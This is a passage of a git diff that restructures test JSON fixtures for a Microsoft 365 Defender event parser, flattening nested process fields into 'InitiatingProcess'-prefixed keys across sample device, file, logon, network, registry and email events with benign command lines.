+ "InitiatingProcessVersionInfoOriginalFileName": "Browser.EXE",
+ "InitiatingProcessVersionInfoProductName": "Test Product",
+ "InitiatingProcessVersionInfoProductVersion": "1, 0, 0, 1"
 },
 "type": "SensitiveFileRead"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json
index 4964dae1f..1f1351d52 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json
@@ -16,9 +16,7 @@
 "@timestamp": "2024-10-22T15:09:08.851712Z",
 "action": {
 "properties": {
- "process": {
- "LogonId": "0"
- }
+ "InitiatingProcessLogonId": "0"
 },
 "type": "ScriptContent"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json
index c34cefa50..3292ed6fe 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json
@@ -22,18 +22,16 @@
 "@timestamp": "2024-11-12T10:19:26.502777Z",
 "action": {
 "properties": {
- "process": {
- "AccountObjectId": "12345678-abcd-1234-efab-56789123abcd",
- "CommandLine": "\"OUTLOOK.EXE\" ",
- "FileSize": 44152968,
- "LogonId": "389220681",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Microsoft Outlook",
- "VersionInfoInternalFileName": "Outlook",
- "VersionInfoOriginalFileName": "Outlook.exe",
- "VersionInfoProductName": "Microsoft Outlook",
- "VersionInfoProductVersion": "16.0.17928.20216"
- }
+ "InitiatingProcessAccountObjectId": "12345678-abcd-1234-efab-56789123abcd",
+ "InitiatingProcessCommandLine": "\"OUTLOOK.EXE\" ",
+ "InitiatingProcessFileSize": 44152968,
+ "InitiatingProcessLogonId": "389220681",
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Microsoft Outlook",
+ "InitiatingProcessVersionInfoInternalFileName": "Outlook",
+ "InitiatingProcessVersionInfoOriginalFileName": "Outlook.exe",
+ "InitiatingProcessVersionInfoProductName": "Microsoft Outlook",
+ "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216"
 },
 "type": "GetClipboardData"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json
index ea0ddb0df..fea26327a 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json
@@ -22,18 +22,16 @@
 "@timestamp": "2024-11-12T10:15:59.550882Z",
 "action": {
 "properties": {
- "process": {
- "AccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789",
- "CommandLine": "powershell.exe",
- "FileSize": 450560,
- "LogonId": "398124703",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Windows PowerShell",
- "VersionInfoInternalFileName": "POWERSHELL",
- "VersionInfoOriginalFileName": "PowerShell.EXE",
- "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
- "VersionInfoProductVersion": "10.0.22621.3085"
- }
+ "InitiatingProcessAccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789",
+ "InitiatingProcessCommandLine": "powershell.exe",
+ "InitiatingProcessFileSize": 450560,
+ "InitiatingProcessLogonId": "398124703",
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Windows PowerShell",
+ "InitiatingProcessVersionInfoInternalFileName": "POWERSHELL",
+ "InitiatingProcessVersionInfoOriginalFileName": "PowerShell.EXE",
+ "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+ "InitiatingProcessVersionInfoProductVersion": "10.0.22621.3085"
 },
 "type": "PowerShellCommand"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json
index 48696c644..672754009 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json
@@ -22,18 +22,16 @@
 "@timestamp": "2024-11-12T10:17:23.330722Z",
 "action": {
 "properties": {
- "process": {
- "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456",
- "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"",
- "FileSize": 1621656,
- "LogonId": "8066492",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Microsoft Word",
- "VersionInfoInternalFileName": "WinWord",
- "VersionInfoOriginalFileName": "WinWord.exe",
- "VersionInfoProductName": "Microsoft Office",
- "VersionInfoProductVersion": "16.0.17928.20216"
- }
+ "InitiatingProcessAccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456",
+ "InitiatingProcessCommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"",
+ "InitiatingProcessFileSize": 1621656,
+ "InitiatingProcessLogonId": "8066492",
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Microsoft Word",
+ "InitiatingProcessVersionInfoInternalFileName": "WinWord",
+ "InitiatingProcessVersionInfoOriginalFileName": "WinWord.exe",
+ "InitiatingProcessVersionInfoProductName": "Microsoft Office",
+ "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216"
 },
 "type": "ShellLinkCreateFileEvent"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json
index 94b70858f..7428190cf 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json
@@ -16,19 +16,17 @@
 "@timestamp": "2022-09-01T07:46:42.468408Z",
 "action": {
 "properties": {
- "process": {
- "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "CommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ",
- "FileSize": 56824728,
- "IntegrityLevel": "Medium",
- "TokenElevation": "TokenElevationTypeDefault",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup",
- "VersionInfoInternalFileName": "OneDriveSetup.exe",
- "VersionInfoOriginalFileName": "OneDriveSetup.exe",
- "VersionInfoProductName": "Microsoft OneDrive",
- "VersionInfoProductVersion": "22.166.0807.0002"
- }
+ "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "InitiatingProcessCommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ",
+ "InitiatingProcessFileSize": 56824728,
+ "InitiatingProcessIntegrityLevel": "Medium",
+ "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup",
+ "InitiatingProcessVersionInfoInternalFileName": "OneDriveSetup.exe",
+ "InitiatingProcessVersionInfoOriginalFileName": "OneDriveSetup.exe",
+ "InitiatingProcessVersionInfoProductName": "Microsoft OneDrive",
+ "InitiatingProcessVersionInfoProductVersion": "22.166.0807.0002"
 },
 "type": "FileDeleted"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json
index 1a9daafcd..73d8718f8 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json
@@ -22,19 +22,17 @@
 "@timestamp": "2024-11-08T14:38:51.904876Z",
 "action": {
 "properties": {
- "RequestAccountSid": "S-1-2-3",
- "process": {
- "CommandLine": "commandexec.exe /V",
- "FileSize": 176128,
- "IntegrityLevel": "System",
- "TokenElevation": "TokenElevationTypeDefault",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Windows\u00ae installer",
- "VersionInfoInternalFileName": "commandexec",
- "VersionInfoOriginalFileName": "commandexec.exe",
- "VersionInfoProductName": "Windows Installer - Unicode",
- "VersionInfoProductVersion": "5.0.22621.3880"
- }
+ "InitiatingProcessCommandLine": "commandexec.exe /V",
+ "InitiatingProcessFileSize": 176128,
+ "InitiatingProcessIntegrityLevel": "System",
+ "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer",
+ "InitiatingProcessVersionInfoInternalFileName": "commandexec",
+ "InitiatingProcessVersionInfoOriginalFileName": "commandexec.exe",
+ "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode",
+ "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880",
+ "RequestAccountSid": "S-1-2-3"
 },
 "type": "FileCreated"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json
index 04559806a..497faa7bf 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json
@@ -16,12 +16,10 @@
 "@timestamp": "2022-09-01T07:47:58.616127Z",
 "action": {
 "properties": {
- "process": {
- "CommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"",
- "FileSize": 66560,
- "IntegrityLevel": "Medium",
- "TokenElevation": "TokenElevationTypeDefault"
- }
+ "InitiatingProcessCommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"",
+ "InitiatingProcessFileSize": 66560,
+ "InitiatingProcessIntegrityLevel": "Medium",
+ "InitiatingProcessTokenElevation": "TokenElevationTypeDefault"
 },
 "type": "ImageLoaded"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json
index e70edf395..15dc7a41b 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json
@@ -17,11 +17,9 @@
 "action": {
 "properties": {
 "AccountSid": "S-1-1-11-1-1",
+ "InitiatingProcessCommandLine": "WinLogon.exe -SpecialSession",
 "LogonId": "111111",
- "LogonType": "Interactive",
- "process": {
- "CommandLine": "WinLogon.exe -SpecialSession"
- }
+ "LogonType": "Interactive"
 },
 "type": "LogonSuccess"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json
index 75ab306b8..348f76f4e 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json
@@ -16,21 +16,19 @@
 "@timestamp": "2023-01-04T14:05:32.314862Z",
 "action": {
 "properties": {
+ "InitiatingProcessAccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614",
+ "InitiatingProcessCommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx",
+ "InitiatingProcessFileSize": 63984520,
+ "InitiatingProcessIntegrityLevel": "Medium",
+ "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Microsoft Excel",
+ "InitiatingProcessVersionInfoInternalFileName": "Excel",
+ "InitiatingProcessVersionInfoOriginalFileName": "Excel.exe",
+ "InitiatingProcessVersionInfoProductName": "Microsoft Office",
+ "InitiatingProcessVersionInfoProductVersion": "16.0.15601.20538",
 "LocalIPType": "Private",
- "RemoteIPType": "Public",
- "process": {
- "AccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614",
- "CommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx",
- "FileSize": 63984520,
- "IntegrityLevel": "Medium",
- "TokenElevation": "TokenElevationTypeDefault",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Microsoft Excel",
- "VersionInfoInternalFileName": "Excel",
- "VersionInfoOriginalFileName": "Excel.exe",
- "VersionInfoProductName": "Microsoft Office",
- "VersionInfoProductVersion": "16.0.15601.20538"
- }
+ "RemoteIPType": "Public"
 },
 "type": "ConnectionSuccess"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
index 3847a138b..5a90081c8 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
@@ -17,30 +17,26 @@
 "action": {
 "properties": {
 "AccountSid": "S-1-1-11",
+ "InitiatingProcessCommandLine": "\"MsMpEng.exe\"",
+ "InitiatingProcessFileSize": 133576,
+ "InitiatingProcessIntegrityLevel": "System",
+ "InitiatingProcessLogonId": "999",
+ "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Antimalware Service Executable",
+ "InitiatingProcessVersionInfoInternalFileName": "MsMpEng.exe",
+ "InitiatingProcessVersionInfoOriginalFileName": "MsMpEng.exe",
+ "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+ "InitiatingProcessVersionInfoProductVersion": "4.18.2301.6",
 "LogonId": "999",
- "process": {
- "IntegrityLevel": "System",
- "TokenElevation": "TokenElevationTypeDefault",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility",
- "VersionInfoInternalFileName": "MpCmdRun",
- "VersionInfoOriginalFileName": "MpCmdRun.exe",
- "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
- "VersionInfoProductVersion": "4.18.2301.6",
- "parent": {
- "CommandLine": "\"MsMpEng.exe\"",
- "FileSize": 133576,
- "IntegrityLevel": "System",
- "LogonId": "999",
- "TokenElevation": "TokenElevationTypeDefault",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Antimalware Service Executable",
- "VersionInfoInternalFileName": "MsMpEng.exe",
- "VersionInfoOriginalFileName": "MsMpEng.exe",
- "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
- "VersionInfoProductVersion": "4.18.2301.6"
- }
- }
+ "ProcessIntegrityLevel": "System",
+ "ProcessTokenElevation": "TokenElevationTypeDefault",
+ "ProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "ProcessVersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility",
+ "ProcessVersionInfoInternalFileName": "MpCmdRun",
+ "ProcessVersionInfoOriginalFileName": "MpCmdRun.exe",
+ "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+ "ProcessVersionInfoProductVersion": "4.18.2301.6"
 },
 "type": "ProcessCreated"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
index cac1e9791..cab75fb0a 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
@@ -23,30 +23,26 @@
 "action": {
 "properties": {
 "AccountSid": "S-1-2-3",
+ "InitiatingProcessCommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000",
+ "InitiatingProcessFileSize": 145408,
+ "InitiatingProcessIntegrityLevel": "System",
+ "InitiatingProcessLogonId": "999",
+ "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer",
+ "InitiatingProcessVersionInfoInternalFileName": "file",
+ "InitiatingProcessVersionInfoOriginalFileName": "file.exe",
+ "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode",
+ "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880",
 "LogonId": "999",
- "process": {
- "IntegrityLevel": "System",
- "TokenElevation": "TokenElevationTypeDefault",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Network Command Shell",
- "VersionInfoInternalFileName": "processcommand.exe",
- "VersionInfoOriginalFileName": "processcommand.exe",
- "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
- "VersionInfoProductVersion": "10.0.22621.1",
- "parent": {
- "CommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000",
- "FileSize": 145408,
- "IntegrityLevel": "System",
- "LogonId": "999",
- "TokenElevation": "TokenElevationTypeDefault",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Windows\u00ae installer",
- "VersionInfoInternalFileName": "file",
- "VersionInfoOriginalFileName": "file.exe",
- "VersionInfoProductName": "Windows Installer - Unicode",
- "VersionInfoProductVersion": "5.0.22621.3880"
- }
- }
+ "ProcessIntegrityLevel": "System",
+ "ProcessTokenElevation": "TokenElevationTypeDefault",
+ "ProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "ProcessVersionInfoFileDescription": "Network Command Shell",
+ "ProcessVersionInfoInternalFileName": "processcommand.exe",
+ "ProcessVersionInfoOriginalFileName": "processcommand.exe",
+ "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+ "ProcessVersionInfoProductVersion": "10.0.22621.1"
 },
 "type": "ProcessCreated"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json
index 212f23549..3fe0d2cf8 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json
@@ -16,19 +16,17 @@
 "@timestamp": "2023-01-04T14:35:20.616193Z",
 "action": {
 "properties": {
- "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements",
- "process": {
- "CommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0",
- "FileSize": 445440,
- "IntegrityLevel": "System",
- "TokenElevation": "TokenElevationTypeDefault",
- "VersionInfoCompanyName": "Microsoft Corporation",
- "VersionInfoFileDescription": "Host Process for OMA-DM Client",
- "VersionInfoInternalFileName": "omadmclient",
- "VersionInfoOriginalFileName": "omadmclient.exe",
- "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
- "VersionInfoProductVersion": "10.0.19041.2193"
- }
+ "InitiatingProcessCommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0",
+ "InitiatingProcessFileSize": 445440,
+ "InitiatingProcessIntegrityLevel": "System",
+ "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
+ "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Host Process for OMA-DM Client",
+ "InitiatingProcessVersionInfoInternalFileName": "omadmclient",
+ "InitiatingProcessVersionInfoOriginalFileName": "omadmclient.exe",
+ "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+ "InitiatingProcessVersionInfoProductVersion": "10.0.19041.2193",
+ "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements"
 },
 "type": "RegistryKeyDeleted"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
index c632ebbfa..a04e0e8be 100644
--- a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
+++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
@@ -16,9 +16,7 @@
 "@timestamp": "2024-10-22T15:09:47.246794Z",
 "action": {
 "properties": {
- "process": {
- "LogonId": "0"
- }
+ "InitiatingProcessLogonId": "0"
 },
 "type": "ScriptContent"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_events.json b/Microsoft/microsoft-365-defender/tests/test_email_events.json
index 5f3e9f9b1..294c92d60 100644
--- a/Microsoft/microsoft-365-defender/tests/test_email_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_email_events.json
@@ -17,18 +17,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json index 57b4e7abc..031a0b50a 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json 
+++ b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json index e45140956..7d110bb54 100644 
--- a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, 
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info.json b/Microsoft/microsoft-365-defender/tests/test_identity_info.json index f1753e2d7..0a0174b85 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_info.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_info.json 
@@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json index 3e55ad2b0..6077ecfdc 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json 
